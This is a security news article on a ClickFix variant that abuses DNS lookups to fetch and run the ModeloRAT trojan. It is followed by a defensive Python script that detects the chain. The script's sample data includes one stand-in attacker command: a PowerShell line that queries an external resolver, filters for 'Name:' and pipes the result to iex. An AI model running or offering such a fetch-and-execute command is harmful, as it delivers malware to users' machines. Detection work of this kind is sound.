Microsoft Warns of ClickFix Attack Exploiting DNS Lookups for Malicious Purposes


New Variant of ClickFix Attack Technique Identified

A new variant of the ClickFix attack technique has been identified that uses DNS lookups to retrieve and run malware. ClickFix works by displaying a fake error message on a compromised or malicious website and instructing the target to run a command that supposedly fixes the problem. Unbeknownst to the user, that command is attacker-supplied, so the "fix" hands the attacker code execution on the user's own machine.

Attack Technique

In a recent instance of this attack, the target was instructed to run a command that performed a DNS lookup against a hard-coded external DNS server rather than the system's configured resolver. The lookup output was then filtered to extract the 'Name:' line of the response, and the text of that line was executed as the second-stage command. Outbound DNS is permitted almost everywhere and rarely inspected, so the lookup lets the attacker deliver the payload from infrastructure they control while blending in with ordinary DNS traffic, and the query arriving at their server also tells them that the victim actually ran the command.

Second-Stage Payload

The second-stage payload is a remote access trojan known as ModeloRAT, which allows attackers to collect information about the compromised system and execute additional payloads. While the origin of these attacks is unclear, a threat actor tracked as KongTuke has been linked to a similar campaign, dubbed CrashFix, which targeted corporate environments.

Effectiveness and Mitigation

The ClickFix technique has been increasingly used by both cybercriminals and state-sponsored actors over the past year. It works because the victim performs the execution step themselves: no software vulnerability is exploited, the payload arrives as a command the user runs rather than as a file a browser or mail gateway could block, and users tend to trust error messages that appear to come from their own system. Users should therefore treat any error message or "fix" that asks them to run a command with suspicion.

The use of DNS lookups in this variant highlights the importance of monitoring network traffic and DNS queries for suspicious activity, in particular lookups sent to resolvers other than the organization's own, and command lines in which the output of a DNS lookup is filtered and passed to a command interpreter. Organizations should also educate their users about the risks of following instructions from unknown sources and the importance of verifying the authenticity of error messages and system instructions.
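The chain described in the Attack Technique section and the monitoring advice above suggest a concrete detection: look for a DNS lookup against a non-approved resolver whose output is filtered for the 'Name:' line and handed to an execution primitive, and separately for port-53 traffic that bypasses the corporate resolvers. The script below is an added example, not code from Microsoft's report or from this article. It assumes the lookup is done with nslookup (whose output contains a 'Name:' line, which is what the 'Name:' filter implies), and the approved-resolver list, the sample command lines and the connection records are all constructed for the example; the attacker-style command line is a hypothetical stand-in, not the command used in the campaign.

```python
"""Detection logic for the DNS-lookup ClickFix variant (added example).

Two signals are evaluated over constructed sample telemetry:
  1. Process creation: a command line that runs nslookup against an
     explicit resolver, filters the output for 'Name:' and passes the
     result to something that executes it.
  2. Network: a port-53 connection to a resolver outside the
     organization's approved set.
"""
import re

# Resolvers endpoints are allowed to query. Hypothetical; substitute your own.
APPROVED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}

NSLOOKUP_RE = re.compile(r"\bnslookup(?:\.exe)?\b", re.IGNORECASE)
# nslookup [-options] <name> <server>: the second positional argument is the
# server. Pipes, quotes and separators are excluded from the tokens.
NSLOOKUP_SERVER_RE = re.compile(
    r"\bnslookup(?:\.exe)?\s+(?:-\S+\s+)*([^\s|;&'\"]+)\s+([^\s|;&'\"]+)",
    re.IGNORECASE,
)
# Output filtered down to the 'Name:' line of the reply.
NAME_FILTER_RE = re.compile(
    r"\b(findstr|select-string|sls|grep)\b[^|]*\bname:", re.IGNORECASE
)
# The filtered text being executed (PowerShell iex, cmd 'for /f ... do').
EXEC_RE = re.compile(
    r"(invoke-expression|\biex\b|\bfor\s+/f\b|\bstart-process\b)",
    re.IGNORECASE,
)


def score_command_line(cmdline):
    """Return the indicators matched by one process command line.

    Each indicator alone is weak (admins query external resolvers, scripts
    filter output); all three together are the chain this variant needs.
    """
    hits = []
    if not NSLOOKUP_RE.search(cmdline):
        return hits
    m = NSLOOKUP_SERVER_RE.search(cmdline)
    if m and m.group(2) not in APPROVED_RESOLVERS:
        hits.append(f"nslookup against non-approved resolver {m.group(2)}")
    if NAME_FILTER_RE.search(cmdline):
        hits.append("lookup output filtered for 'Name:'")
    if EXEC_RE.search(cmdline):
        hits.append("lookup output passed to an execution primitive")
    return hits


def is_clickfix_chain(cmdline):
    """True only when the full three-step chain is present."""
    return len(score_command_line(cmdline)) == 3


def flag_dns_egress(events):
    """Return port-53 connections that bypass the approved resolvers.

    Events are dicts with 'process', 'dst_ip' and 'dst_port' (a constructed
    shape for this example; map your own telemetry onto it).
    """
    return [
        ev for ev in events
        if ev["dst_port"] == 53 and ev["dst_ip"] not in APPROVED_RESOLVERS
    ]


# Constructed sample process command lines (203.0.113.0/24 is a
# documentation range; the first line is a stand-in, not the real command).
SAMPLE_COMMANDS = [
    "powershell.exe -nop -w hidden -c \"$r = nslookup update.example.test "
    "203.0.113.5 | Select-String 'Name:'; iex ($r -replace 'Name:','')\"",
    # Benign: helpdesk query against the corporate resolver.
    "nslookup intranet.corp.example 10.0.0.53",
    # Benign: no explicit server at all.
    "nslookup www.example.com",
    # Partial chain: external resolver and filter, but nothing executes it.
    "cmd.exe /c nslookup -type=A host.example.test 203.0.113.5 | findstr Name:",
]

# Constructed sample connection records.
SAMPLE_NET = [
    {"process": "nslookup.exe", "dst_ip": "203.0.113.5", "dst_port": 53},
    {"process": "svchost.exe", "dst_ip": "10.0.0.53", "dst_port": 53},
    {"process": "chrome.exe", "dst_ip": "203.0.113.9", "dst_port": 443},
]


def main():
    for cmd in SAMPLE_COMMANDS:
        hits = score_command_line(cmd)
        label = "FULL CHAIN" if is_clickfix_chain(cmd) else "partial/none"
        print(f"[{label}] {cmd[:70]}")
        for h in hits:
            print("    -", h)
    for ev in flag_dns_egress(SAMPLE_NET):
        print("[DNS EGRESS]", ev["process"], "->", ev["dst_ip"])


if __name__ == "__main__":
    main()
```

The command-line check is deliberately split into three weak indicators that are only high confidence in combination; the fourth sample shows the partial case a hunt should still review but not alert on. The network check is the complementary control: even when the process telemetry is missing, a port-53 connection from an endpoint to anything other than the approved resolvers is worth an alert, since well-managed endpoints should never need one.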



